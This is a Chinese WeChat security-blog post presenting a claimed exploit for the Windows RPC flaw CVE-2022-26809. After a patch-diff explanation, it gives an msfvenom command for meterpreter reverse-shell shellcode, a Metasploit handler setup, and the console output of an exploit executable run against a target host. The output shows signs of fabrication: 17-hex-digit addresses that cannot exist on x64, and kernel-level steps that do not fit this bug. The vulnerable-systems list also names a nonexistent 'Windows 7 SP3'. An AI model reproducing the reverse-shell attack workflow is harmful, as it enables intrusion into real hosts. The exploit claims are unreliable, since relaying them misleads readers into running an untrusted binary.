【分享 | 附EXP】CVE-2022-26809 RCE 漏洞

来源GitHub：项目作者：rkxxz

CVE 描述

CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因，因为攻击不需要身份验证并且可以通过网络远程执行，并且可能导致远程代码执行 ( RCE) 具有 RPC 服务的权限，这取决于托管 RPC 运行时的进程。运气好的话，这个严重的错误允许访问运行 SMB 的未打补丁的 Windows 主机。该漏洞既可以从网络外部被利用以破坏它，也可以在网络中的机器之间被利用。

供应商信息

• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809

• https://www.pwndefend.com/2022/04/14/cve-2022-26809/

谁是脆弱的？

测试易受攻击的主机：

• Windows 10 专业版 10.0.10240 x64

• Windows 10 专业版 10.0.19042 x64

• Windows 10 专业版 10.0.19044 x64

• Windows 服务器 2019 x64

• Windows 服务器 2022 x64

• 视窗 7 SP3 x64

我们稍后会更新该列表。我们怀疑几乎所有运行 SMB 并开放 445 端口的构建都会受到影响。

RPC 端口

TCP 135,139,445

定位漏洞

CVE 表示，漏洞位于 Windows RPC 运行时中，该运行时在名为 rpcrt4.dll 的库中实现。该运行时库被加载到使用 RPC 协议进行通信的客户端和服务器进程中。我们比较了版本 10.0.22000.434（3 月）和 10.0.22000.613（已修补）并挑选出更改列表。

OSF_SCALL::ProcessResponse 和 OSF_CCALL::ProcessReceivedPDU 函数本质上是相似的；两者都处理 RPC 数据包，但一个在服务器端运行，另一个在客户端运行（SCALL 和 CCALL）。通过区分 OSF_SCALL::ProcessReceivedPDU，我们注意到新版本中添加了两个代码块。

查看修补后的代码，我们看到在 QUEUE::PutOnQueue 之后调用了一个新函数。检查新函数并深入研究它的代码，我们发现它检查整数溢出。换句话说，patch 中的新函数被添加来验证整数变量是否保持在预期值范围内。

深入研究 OSF_SCALL:GetCoalescedBuffer 中的易受攻击代码，我们注意到整数溢出错误可能导致堆缓冲区溢出，其中数据被复制到太小而无法填充的缓冲区。这反过来又允许在堆上将数据写入缓冲区边界之外。当被利用时，这个原语会导致我们远程执行代码！

在其他函数中也添加了相同的用于检查整数溢出的调用：

OSF_CCALL::ProcessResponse OSF_SCALL::GetCoalescedBuffer OSF_CCALL::GetCoalescedBuffer

整数溢出漏洞和防止它的功能存在于客户端和服务器端执行流程中。

开发

第1步

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.105 LPORT=4444 -f raw > shellcode.bin

第2步

msf5 > use multi/handlermsf5 exploit(multi/handler) > set LHOST 192.168.10.105LHOST => 192.168.10.105msf5 exploit(multi/handler) > set LPORT 4444LPORT => 4444msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > run

开发

CVE-2022-26809 ip 端口

C:>CVE-2022-26809.exe 192.168.10.110 445CVE-2022-26809 RPC Remote Exploit[+] Checking... 192.168.10.110 445[+] 192.168.10.110 445 IsOpen[+] found low stub at phys addr 6800![+] Pipe at 4ac660[+] base of RPC heap at fffff79480048033[+] ntoskrnl entry at fffff802435782060[+] found Pipe self-ref entry 1eb[+] found Alsr at fffff64480301671[+] found RPC CALL at fffff802451b3b30[+] load shellcode.bin[+] built shellcode![+] KUSER_SHARED_DATA PTE at fffff4ffc0033060[+] KUSER_SHARED_DATA PTE NX bit cleared![+] Wrote shellcode at fffff75006070a023![+] Try to execute shellcode![ ] Exploit Suceess!

来源：https://github.com/rkxxz/CVE-2022-26809

也可后台回复关键字" 202226809 "

建议虚拟机运行

>精彩回顾<

干货 | 红队快速批量打点的利器

【干货】最全的Tomcat漏洞复现

{Vulhub漏洞复现（一）ActiveMQ}

{Vulhub漏洞复现（二） Apereo CAS}

Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法

【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现

干货 | 横向移动与域控权限维持方法总汇

干货 | 免杀ShellCode加载框架

【干货】phpMyAdmin漏洞利用汇总

【神兵利器 | 附下载】一个用于隐藏C2的、开箱即用的Tools

分享 | 个人渗透技巧汇总（避坑）笔记

关注我

获得更多精彩

坚持学习与分享！走过路过点个"在看"，不会错过

仅用于学习交流，不得用于非法用途

如侵权请私聊公众号删文

觉得文章不错给点个‘再看’吧

原文始发于微信公众号（EchoSec）：【分享 | 附EXP】CVE-2022-26809 RCE 漏洞